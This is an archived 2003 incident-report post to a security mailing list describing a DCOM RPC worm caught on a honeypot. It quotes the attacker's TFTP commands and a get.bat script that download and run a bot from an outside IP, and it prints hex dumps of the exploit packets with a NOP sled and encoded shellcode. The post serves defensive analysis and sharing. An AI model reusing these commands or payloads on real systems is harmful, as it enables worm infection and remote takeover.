DCOM worm with get.bat bot.rar

From: Andrej (laj_at_swordlord.com)
Date: 08/19/03

Next message: Thomas.Ray_at_tcud.state.tx.us: "RE: Software vendor clueless"

Previous message: FWAdmin: "Strange blaster behavior"
Next in thread: Jeremiah Cornelius: "Re: DCOM worm with get.bat bot.rar"
Reply: Jeremiah Cornelius: "Re: DCOM worm with get.bat bot.rar"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: incidents@securityfocus.com
Date: Tue, 19 Aug 2003 11:05:57 +0200

I just got a new DCOM worm on our honeypot. After the exploit on port 135
(dump below) a connection was built on port 4444:
TFTP -i 81.103.7.66 GET get.bat
get.bat
exit
I was able to get the get.bat it's:
mkdir C:\RECYCLER\S-1-5-21-57989841-1715567821-725345543-1004\
cd C:\RECYCLER\S-1-5-21-57989841-1715567821-725345543-1004\
TFTP -i 81.103.7.66 GET bot.rar
TFTP -i 81.103.7.66 GET unrar.bat
TFTP -i 81.103.7.66 GET unrar.exe
start unrar.bat
exit
unfortunately I was not able to download the bot.rar for inspection because
the connection timed out. Maybe somebody else is more successful

cheers
andrej

[2003-08-19 10:37:34]
IPv4: 81.103.7.66 -> *
hlen=5 TOS=0 dlen=1500 ID=48197 flags=0 offset=0 TTL=114
chksum=43601
TCP: port=1176 -> dport: 135 flags=***A**** seq=2683878707
ack=1434085177 off=5 res=0 win=64240 urp=0 chksum=61593
Payload: length = 1460

000 : 05 00 00 03 10 00 00 00 A8 06 00 00 E5 00 00 00 ................
010 : 90 06 00 00 01 00 04 00 05 00 06 00 01 00 00 00 ................
020 : 00 00 00 00 32 24 58 FD CC 45 64 49 B0 70 DD AE ....2$X..EdI.p..
030 : 74 2C 96 D2 60 5E 0D 00 01 00 00 00 00 00 00 00 t,..`^..........
040 : 70 5E 0D 00 02 00 00 00 7C 5E 0D 00 00 00 00 00 p^......|^......
050 : 10 00 00 00 80 96 F1 F1 2A 4D CE 11 A6 6A 00 20 ........*M...j.
060 : AF 6E 72 F4 0C 00 00 00 4D 41 52 42 01 00 00 00 .nr.....MARB....
070 : 00 00 00 00 0D F0 AD BA 00 00 00 00 A8 F4 0B 00 ................
080 : 20 06 00 00 20 06 00 00 4D 45 4F 57 04 00 00 00 ... ...MEOW....
090 : A2 01 00 00 00 00 00 00 C0 00 00 00 00 00 00 46 ...............F
0a0 : 38 03 00 00 00 00 00 00 C0 00 00 00 00 00 00 46 8..............F
0b0 : 00 00 00 00 F0 05 00 00 E8 05 00 00 00 00 00 00 ................
0c0 : 01 10 08 00 CC CC CC CC C8 00 00 00 4D 45 4F 57 ............MEOW
0d0 : E8 05 00 00 D8 00 00 00 00 00 00 00 02 00 00 00 ................
0e0 : 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0f0 : 00 00 00 00 C4 28 CD 00 64 29 CD 00 00 00 00 00 .....(..d)......
100 : 07 00 00 00 B9 01 00 00 00 00 00 00 C0 00 00 00 ................
110 : 00 00 00 46 AB 01 00 00 00 00 00 00 C0 00 00 00 ...F............
120 : 00 00 00 46 A5 01 00 00 00 00 00 00 C0 00 00 00 ...F............
130 : 00 00 00 46 A6 01 00 00 00 00 00 00 C0 00 00 00 ...F............
140 : 00 00 00 46 A4 01 00 00 00 00 00 00 C0 00 00 00 ...F............
150 : 00 00 00 46 AD 01 00 00 00 00 00 00 C0 00 00 00 ...F............
160 : 00 00 00 46 AA 01 00 00 00 00 00 00 C0 00 00 00 ...F............
170 : 00 00 00 46 07 00 00 00 60 00 00 00 58 00 00 00 ...F....`...X...
180 : 90 00 00 00 40 00 00 00 20 00 00 00 38 03 00 00 ....@... ...8...
190 : 30 00 00 00 01 00 00 00 01 10 08 00 CC CC CC CC 0...............
1a0 : 50 00 00 00 4F B6 88 20 FF FF FF FF 00 00 00 00 P...O.. ........
1b0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
1c0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
1d0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
1e0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
1f0 : 00 00 00 00 00 00 00 00 01 10 08 00 CC CC CC CC ................
200 : 48 00 00 00 07 00 66 00 06 09 02 00 00 00 00 00 H.....f.........
210 : C0 00 00 00 00 00 00 46 10 00 00 00 00 00 00 00 .......F........
220 : 00 00 00 00 01 00 00 00 00 00 00 00 78 19 0C 00 ............x...
230 : 58 00 00 00 05 00 06 00 01 00 00 00 70 D8 98 93 X...........p...
240 : 98 4F D2 11 A9 3D BE 57 B2 00 00 00 32 00 31 00 .O...=.W....2.1.
250 : 01 10 08 00 CC CC CC CC 80 00 00 00 0D F0 AD BA ................
260 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
270 : 18 43 14 00 00 00 00 00 60 00 00 00 60 00 00 00 .C......`...`...
280 : 4D 45 4F 57 04 00 00 00 C0 01 00 00 00 00 00 00 MEOW............
290 : C0 00 00 00 00 00 00 46 3B 03 00 00 00 00 00 00 .......F;.......
2a0 : C0 00 00 00 00 00 00 46 00 00 00 00 30 00 00 00 .......F....0...
2b0 : 01 00 01 00 81 C5 17 03 80 0E E9 4A 99 99 F1 8A ...........J....
2c0 : 50 6F 7A 85 02 00 00 00 00 00 00 00 00 00 00 00 Poz.............
2d0 : 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 ................
2e0 : 01 10 08 00 CC CC CC CC 30 00 00 00 78 00 6E 00 ........0...x.n.
2f0 : 00 00 00 00 D8 DA 0D 00 00 00 00 00 00 00 00 00 ................
300 : 20 2F 0C 00 00 00 00 00 00 00 00 00 03 00 00 00 /..............
310 : 00 00 00 00 03 00 00 00 46 00 58 00 00 00 00 00 ........F.X.....
320 : 01 10 08 00 CC CC CC CC 10 00 00 00 30 00 2E 00 ............0...
330 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
340 : 01 10 08 00 CC CC CC CC 68 00 00 00 0E 00 FF FF ........h.......
350 : 68 8B 0B 00 02 00 00 00 00 00 00 00 00 00 00 00 h...............
360 : 86 01 00 00 00 00 00 00 86 01 00 00 5C 00 5C 00 ............\.\.
370 : 46 00 58 00 4E 00 42 00 46 00 58 00 46 00 58 00 F.X.N.B.F.X.F.X.
380 : 4E 00 42 00 46 00 58 00 46 00 58 00 46 00 58 00 N.B.F.X.F.X.F.X.
390 : 46 00 58 00 9D 13 00 01 CC E0 FD 7F CC E0 FD 7F F.X...........
3a0 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
3b0 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
3c0 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
3d0 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
3e0 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
3f0 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
400 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
410 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
420 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
430 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
440 : 90 90 90 90 90 90 90 EB 19 5E 31 C9 81 E9 89 FF .........^1.....
450 : FF FF 81 36 80 BF 32 94 81 EE FC FF FF FF E2 F2 ...6..2.........
460 : EB 05 E8 E2 FF FF FF 03 53 06 1F 74 57 75 95 80 ........S..tWu..
470 : BF BB 92 7F 89 5A 1A CE B1 DE 7C E1 BE 32 94 09 ....Z....|..2..
480 : F9 3A 6B B6 D7 9F 4D 85 71 DA C6 81 BF 32 1D C6 .:k...M.q....2..
490 : B3 5A F8 EC BF 32 FC B3 8D 1C F0 E8 C8 41 A6 DF .Z...2.......A..
4a0 : EB CD C2 88 36 74 90 7F 89 5A E6 7E 0C 24 7C AD ....6t..Z.~.$|.
4b0 : BE 32 94 09 F9 22 6B B6 D7 4C 4C 62 CC DA 8A 81 .2..."k..LLb....
4c0 : BF 32 1D C6 AB CD E2 84 D7 F9 79 7C 84 DA 9A 81 .2........y|....
4d0 : BF 32 1D C6 A7 CD E2 84 D7 EB 9D 75 12 DA 6A 80 .2.........u..j.
4e0 : BF 32 1D C6 A3 CD E2 84 D7 96 8E F0 78 DA 7A 80 .2..........x.z.
4f0 : BF 32 1D C6 9F CD E2 84 D7 96 39 AE 56 DA 4A 80 .2........9.V.J.
500 : BF 32 1D C6 9B CD E2 84 D7 D7 DD 06 F6 DA 5A 80 .2............Z.
510 : BF 32 1D C6 97 CD E2 84 D7 D5 ED 46 C6 DA 2A 80 .2.........F..*.
520 : BF 32 1D C6 93 01 6B 01 53 A2 95 80 BF 66 FC 81 .2....k.S....f..
530 : BE 32 94 7F E9 2A C4 D0 EF 62 D4 D0 FF 62 6B D6 .2..*...b...bk.
540 : A3 B9 4C D7 E8 5A 96 80 AE 6E 1F 4C D5 24 C5 D3 ..L..Z...n.L.$..
550 : 40 64 B4 D7 EC CD C2 A4 E8 63 C7 7F E9 1A 1F 50 @d.......c....P
560 : D7 57 EC E5 BF 5A F7 ED DB 1C 1D E6 8F B1 78 D4 .W...Z........x.
570 : 32 0E B0 B3 7F 01 5D 03 7E 27 3F 62 42 F4 D0 A4 2....].~'?bB...
580 : AF 76 6A C4 9B 0F 1D D4 9B 7A 1D D4 9B 7E 1D D4 .vj......z...~..
590 : 9B 62 19 C4 9B 22 C0 D0 EE 63 C5 EA BE 63 C5 7F .b..."...c...c.
5a0 : C9 02 C5 7F E9 22 1F 4C D5 CD 6B B1 40 64 98 0B ....".L..k.@d..
5b0 : 77 65 6B D6 wek.

[2003-08-19 10:37:34]
IPv4: 81.103.7.66 -> *
hlen=5 TOS=0 dlen=284 ID=48198 flags=0 offset=0 TTL=114
chksum=44816
TCP: port=1176 -> dport: 135 flags=***AP*** seq=2683880167
ack=1434085177 off=5 res=0 win=64240 urp=0 chksum=21751
Payload: length = 244

000 : 93 CD C2 94 EA 64 F0 21 8F 32 94 80 3A F2 EC 8C .....d.!.2..:...
010 : 34 72 98 0B CF 2E 39 0B D7 3A 7F 89 34 72 A0 0B 4r....9..:.4r..
020 : 17 8A 94 80 BF B9 51 DE E2 F0 90 80 EC 67 C2 D7 ......Q......g..
030 : 34 5E B0 98 34 77 A8 0B EB 37 EC 83 6A B9 DE 98 4^..4w...7..j...
040 : 34 68 B4 83 62 D1 A6 C9 34 06 1F 83 4A 01 6B 7C 4h..b...4...J.k|
050 : 8C F2 38 BA 7B 46 93 41 70 3F 97 78 54 C0 AF FC ..8.{F.Ap?.xT...
060 : 9B 26 E1 61 34 68 B0 83 62 54 1F 8C F4 B9 CE 9C .&.a4h..bT......
070 : BC EF 1F 84 34 31 51 6B BD 01 54 0B 6A 6D CA DD ....41Qk..T.jm..
080 : E4 F0 90 80 2F A2 04 00 5C 00 43 00 24 00 5C 00 ..../...\.C.$.\.
090 : 31 00 32 00 33 00 34 00 35 00 36 00 31 00 31 00 1.2.3.4.5.6.1.1.
0a0 : 31 00 31 00 31 00 31 00 31 00 31 00 31 00 31 00 1.1.1.1.1.1.1.1.
0b0 : 31 00 31 00 31 00 31 00 31 00 2E 00 64 00 6F 00 1.1.1.1.1...d.o.
0c0 : 63 00 00 00 01 10 08 00 CC CC CC CC 20 00 00 00 c........... ...
0d0 : 30 00 2D 00 00 00 00 00 88 2A 0C 00 02 00 00 00 0.-......*......
0e0 : 01 00 00 00 28 8C 0C 00 01 00 00 00 07 00 00 00 ....(...........
0f0 : 00 00 00 00 ....

---------------------------------------------------------------------------
Captus Networks - Integrated Intrusion Prevention and Traffic Shaping
- Instantly Stop DoS/DDoS Attacks, Worms & Port Scans
- Automatically Control P2P, IM and Spam Traffic
- Ensure Reliable Performance of Mission Critical Applications
- Precisely Define and Implement Network Security and Performance Policies
**FREE Vulnerability Assessment Toolkit - WhitePapers - Live Demo
Visit us at:
http://www.securityfocus.com/sponsor/CaptusNetworks_incidents_030814
----------------------------------------------------------------------------

Next message: Thomas.Ray_at_tcud.state.tx.us: "RE: Software vendor clueless"

Previous message: FWAdmin: "Strange blaster behavior"
Next in thread: Jeremiah Cornelius: "Re: DCOM worm with get.bat bot.rar"
Reply: Jeremiah Cornelius: "Re: DCOM worm with get.bat bot.rar"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Relevant Pages

Re: [Full-Disclosure] W32/Welchia, W32/Nachi backdoor?
... > Telnetting to this port seems to disconnected after 1-5 characters have been ... > tftp client doesn't seem to offer any means of specifying a port to connect ... The client to infect opens the connection with the stdin/-out of CMD.EXE ...
(Full-Disclosure)
SUMMARY: trying to start in.tftpd ( tftp ) and PXE-E11 ARP Time out
... The service doesn't start until a connection is made. ... I ps -ef|grep tftp and I get nothing. ... To activate a new entry in inetd.conf, ... Then from another host telnet to the tftpd port ...
(SunManagers)
tftp and tcp_wrappers
... We are implementing a tftp server to ... To assist in securing this server we are using ... When inetd accepts a connection on port ... connections that have queued) that spawned the connection. ...
(SunManagers)
Re: Services & Firewall port settings
... > Because this definition of port numbers allowed I/O is a basic security ... Pretty much all of the Windows ... that file that causes some insecurity is the line about tftp. ... I would use a third party firewall instead, ...
(microsoft.public.security)
Re: Downloading nk.bin to Target device without PB?
... Anyone you like that can be set to port 980. ... because that's the filename the bootloader tftp server expects to be ... should use a tftp client on the host. ... download use a slightly modified TFTP protocol (it uses port 980 rather ...
(microsoft.public.windowsce.platbuilder)